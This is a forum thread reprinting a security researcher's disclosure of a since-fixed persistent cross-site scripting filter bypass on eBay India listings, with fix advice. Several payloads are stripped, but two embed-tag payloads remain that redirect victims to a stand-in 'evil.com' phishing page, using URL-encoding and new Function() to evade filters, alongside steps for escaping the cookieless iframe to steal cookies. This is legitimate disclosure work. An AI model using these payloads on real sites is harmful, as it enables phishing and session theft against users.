Results 1 to 5 of 5

Thread: EBay Persistent Cross Site Scripting (Filter Bypass) Share/Save - My123World.Com!

  1. #1
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32

    EBay Persistent Cross Site Scripting (Filter Bypass)

    # Exploit Title: EBay Persistent Cross Site Scripting (Filter Bypass)
    # Software Link: http:// *.ebay.in [Cookie] , http:// http://*.ebaydesc.in [Cookieless]
    # Reported to Vendor: 28/03/11
    # Public Disclosure: 18/08/11
    # At the date of disclosure vendor was already aware of this flaw.
    # Author: FB1H2S aka Rahul Sasi
    # Version: [All language Domain might be vulnerable]
    # Tested on: [.in Domains]

    About Application: Ebay is an online auction portal where sellers could showcase their products and buyers could bid the showcased items for purchasing. Sellers could place their contents with pictures and description of the product.

    Vulnerable Module: Ebay allows a logged in user to revise, edit their listed products, product description also allows HTML with restrictions to scripts and other unwanted tags. This filter is vulnerable and could be bypassed easily.

    This following is how a new product is edited,
    Code:
    http://cgi5.ebay.in/ws/eBayISAPI.dll?ReviseListing&itemid=+product_id+
    An attempt to add malicious contents to the application would provide an error page describing the restrictions users have when adding contents.
    Filters:



    Restriction 1:
    Using trail and error methods it was possible to identify that the filters were string filters, so an attempt to put <script> document.cookie </script> would be restricted as both strings “document.Cookie” and “script” tags are blocked.
    Note: Filters could be either Regular expression based or String match.

    A simple way to by pass this would be to use an object tag and embed JavaScript inside, as filter is not looking out for “<embed” tag, so we would be able to bypass “script” restriction.




    Restriction 2:

    Now we could run java scripts, but the problem again arises due to the filtering of “docunment.cookie” .

    This could be bypassed using the following syntax.



    So on the user interface the script would be reflected and will show the cookies.



    Restriction 3:


    But on the listing page the user content is called via an IFRAME from a cookie less domain[secure practice], that make it impossible to target users cookie who is viewing the listing.

    Code:
    http://vi.ebaydesc.in/ws/eBayISAPI.dll?ViewItemDescV4&item=+evei_item_id+

    Hacking Is a Matter of Time Knowledge and Patience

  2. #2
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32

    Escaping the IFRAME Protection

    In order to escape from the cookie less domain in the iframe and steel user’s cookies another trick could be used.

    The following pages allow the script to be called directly without using an IFAME.



    Here the first URL could execute our queries provided it checks for a particular, if the cookies are present it redirects and call our injected script via IFRAME else would render the page directly.
    First Attack: Password steeling by redirecting to fake login page:

    Attacker sent victim
    Code:
    http://cgi.ebay.in/ws/eBayISAPI.dll?ViewItemNext&item=+Evil_script_injected_product+
    All we have to do now is inject the following script so on execution the page would be redirected to our evil target.



    Restriction 4:
    This script would not be accepted as “window.location”, “href” tags are restricted also eval() tag is restricted. This could be bypassed using the following ways.



    A new function could be used as an alternative for Eval()
    http://javascript.about.com/library/bleval.htm and UrlEncoding “window.location” bypass that filter too.

    And now when victim clicks our link the code would execute in context of ebay.in and he would be redirected to our evil target that could be a fake login page.

    Response




    Code:
    http://cgi.ebay.in/ws/eBayISAPI.dll?ViewItemNext&item=+itemid+
    http://cgi.ebay.in/ws/eBayISAPI.dll?ViewItem&item=220759770785&si=session_id&print=all
    Code:
    Main Page: <embed src=javascript:window.location="http://www.Evil_fakepage.com"; />
    
    Redirected Page: <embed src=javascript:var tmpFunc = new Function(unescape("%0Awindow.location%3D%22http%3A%2f%2fwww.evil.com%2f%22%3B"));tmpFunc(); />


    Second Attack: Cookie Steeling.

    For cookie steeling to work we need to execute the JavaScript in context of *.ebay.in instead of from
    *.ebaydesc.in so only way for that to work would be to redirect the IFRAME to
    Code:
    http://cgi.ebay.in/ws/eBayISAPI.dll?ViewItem&item=220759770785&si=session_id&print=all
    So here the java script would run in context of the *.ebay.in and cookies could be stolen. Here the only issue we would have to face would be predicting &SI value of the link as it would be generated on based on a Cookie “Ebay”.
    Hacking Is a Matter of Time Knowledge and Patience

  3. #3
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    POC Code to Steel Cookies:




    Vulnerability Effects:
    1) User cookies could be retrieved and misused.
    2) Users could be redirected to fake login pages where passwords could be stolen
    3) The possibility of an XSS worm would be there.
    4) Unwanted transactions could be done in context of logged in user.
    Fixing:
    1) Strong XSS filters should be deployed if html is allowed, make sure the XSS filter is updated on continues basis considering the update of HTML 5 tags.
    2) In case of no HTML, htmlencode all the response.write requests.
    3) Many more filter bypassing tags were discovered for current application and is included along with this report.
    Note: Many more filter bypass could be found.

    Other Filter Bypassing Tags:


    Hacking Is a Matter of Time Knowledge and Patience

  4. #4
    Hi Man , but have another filter bypass ? This don't work! Please Help ME!

  5. #5
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    Quote Originally Posted by Huskygold View Post
    Hi Man , but have another filter bypass ? This don't work! Please Help ME!
    Hello @HuskyGold . It doesn't work because vendor has fixed this flaw .
    Spirit was turned 2 ashes ,soul endured so much pain..
    now the darker time evanescence ,the fallen shall rise again.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •